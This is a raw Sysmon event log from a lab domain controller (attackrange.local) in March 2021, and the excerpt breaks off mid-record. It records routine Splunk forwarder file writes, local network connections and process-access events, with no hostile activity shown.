14:02:41.443{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE206B53250E1925B523C28C2B691AA2,SHA256=A0636622530E976F1A06F6593FF11C7A019C1DBB57ED3995F19997CFFA9C3268,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202228Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:42.927{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12B219405969BBF43246DD856C0A657E,SHA256=59B6FA1306B658522820957370D351AABC929695A97BDD5F0EA6E1A31A404697,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202227Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:39.044{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-59265- 23542300x80000000000000002202229Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:43.927{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13E7DFBE5D55D33D565EAC44A1E652F6,SHA256=CC2752687BDE2AB5DFBC86E2B646F50E50171344A66E05315D6300518281D2DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202232Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:44.943{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36FF7653DAF9A474DB5DEEF4E3C55E95,SHA256=D2F12E0D71D6C6D51A68AF404E6E7908E766373B9C9FA0D731E1B97B7BA8F9B1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202231Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:41.013{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60615-false10.0.1.12-8000- 23542300x80000000000000002202230Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:44.239{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6B174853432734B39B8FC10406C8B381,SHA256=DDCB386D1BAC539FD27AF3506AAD184D7E0D89A34E9D3782D2B403CC3E7D9B60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202234Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:45.958{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F170D0CD776A5EAAF41E857E50DCD336,SHA256=B3989089702AD96A200BD27AD1BE12E7B59C5B6AC9A95DBF43338C252D779CCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202233Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:45.255{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CC831F8E5EE68DAD3494CA181761FD3,SHA256=1664FB61EA31E9D8630ED3A0E0E8D4964EF50C9110671247002684959E30C8C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202235Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:46.958{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3A708D6BE1DAE06F863924B758E727E,SHA256=EBA50B4786C45E3F9B73372D9CF4D6045130F48772ED4B7B48DE5EB1683E43E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202236Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:47.974{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8254A56386E4CDAB0D6C23CCC82A9278,SHA256=26FAFCD903AB3485C29240358AA757E9BA3187E9C364876C0A5FD18297D5779A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202237Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:48.989{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E606F1F578860D999C2CBFC82B8D9393,SHA256=84A1F5D3226E78613EC3620BAF672F1E8B66CE063A27A4922E19584BCE09206B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202240Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:49.989{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86BA486244E0A29585D5AAE0CD958FFF,SHA256=94CD7FAA3A39DF2B8719C42DF374FFD9A471FFA1C7D1B3F267E189407ADF888C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202239Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:46.076{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60616-false10.0.1.12-8000- 23542300x80000000000000002202238Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:49.255{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=07C350DED27AE3750251DEC0CE3657F6,SHA256=1A9EEA0FD1ACA69959B6D0A3D10B8CD99FE7B8AF6049CFA69DEEB51F8264762B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202242Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:51.677{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=231E0701986526BD4905BA713AF7E8E8,SHA256=DA5719D971B516A7832B0DF080FA385B92331CBA840F927D31BD1C62B4401334,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202241Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:51.005{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C833BDE07785A3F8F301BBA756B1F965,SHA256=509AF4EBF6D634430E689D1CBE5EA234BBC83FA58A702BC9A5D91378147C66CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202243Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:52.021{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD539E044136B5E8D794E80D52F2F061,SHA256=7DA166975CD4AB119EAB0A5E5A8B1515EEEC1646F8B2B7D1ABD33C9292EFAE21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202244Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:53.036{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B046092253EDD8F061672CE7730DB83,SHA256=E7413113E29AD3EC249C79FAA7344D6D6926B6DDC127A9FE7F73A798D775948D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202246Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:54.349{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A813F286629E0EBC9A49074A90C21819,SHA256=B160A8FA1B9A1B706BDCFEF4331E18EB383A9D66685ADE96EF21165A4EDE9C84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202245Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:54.068{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E575A3C1E1E16C3D0F38E5968B08FAC4,SHA256=204DAD2FB41C7E8F7D7D9326689B6D72DF643354D626A6262343CEB956D97510,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202247Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:55.224{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAA4C678789F67F879D31A9DDA6E954A,SHA256=E178AFE77423C696E8538AC5B493A58C00D65DF0C49A5367F6C660BBC09BCD34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202251Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:56.239{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=256CED8A0331A4ACCA1D170FD2F0DF83,SHA256=9A709A31415D951BF023549B0BD7BEB275C8B1DE1DA6D4E101A80E18787069DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202250Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:51.919{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60617-false10.0.1.12-8000- 354300x80000000000000002202249Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:51.188{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-228.attackrange.local138netbios-dgm 354300x80000000000000002202248Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:51.188{5ABCFE62-8423-603E-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-228.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 354300x80000000000000002202255Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:53.873{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60618-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002202254Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:53.873{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60618-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002202253Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:57.286{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E22723CD5A6D2B4CE8C029C7B7064F7,SHA256=F4479EDF444E9D21B42BACAFB7FAD7AB071EFB1C9F8C116931946FB98EC7C6C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202252Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:57.068{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=305423D21DEFC2DF2C1D66C5122ED97C,SHA256=B08E90B0375773C46B977BE839A18E72CFC2CD4770A8AC2A66786101761B4FCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202256Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:58.380{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27C2200BDBB1A26434B6CBAEE956A2E3,SHA256=E17406C2A3F91984BE6A2BFE6FA80465B153720B4DD13306B70F912F10F02616,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202257Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:59.583{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FED6EA3C8A74D801776EC5F0445D18D6,SHA256=C6D4CB3AEE5BEC06D2C6A410E33ED1B4C9294707440A1A8935520C578AA31162,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202259Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:00.583{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3577C3E1A2AA78A91E2CB7B2573271A,SHA256=F8AA7B1C3C455A2F9381F511C903E0F4D2F1216307DDD15F7B699F4E80B33CC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202258Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:00.208{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E806CF063325E57F838CE8D6131BC21,SHA256=B4CAAC68D753E2A32C9018E85D7A702503198E31EBAA51DA1CF9C66942DF649C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202261Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:01.630{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9F8DBD4EFC55AD886F908C65F077687,SHA256=434626039EDE743A2114F79DB219054D45A3E2685D147E962DDCE8AF38FE10B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202260Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:57.029{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60619-false10.0.1.12-8000- 10341000x80000000000000002202279Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.739{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E896-6040-1F4E-00000000AD01}2336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202278Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.739{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202277Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.739{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202276Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.739{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202275Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.739{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202274Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.739{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E896-6040-1F4E-00000000AD01}2336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202273Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.739{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E896-6040-1F4E-00000000AD01}2336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202272Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.740{5ABCFE62-E896-6040-1F4E-00000000AD01}2336C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202271Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.646{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F853A20FDBF01355C1B34CCA738A9DA0,SHA256=23814B48A46C5E8CA61E7E3CE1AE04548153ADFCDF34D48341CA93A36718669F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202270Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.302{5ABCFE62-E896-6040-1E4E-00000000AD01}56884876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202269Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.161{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E896-6040-1E4E-00000000AD01}5688C:\Program 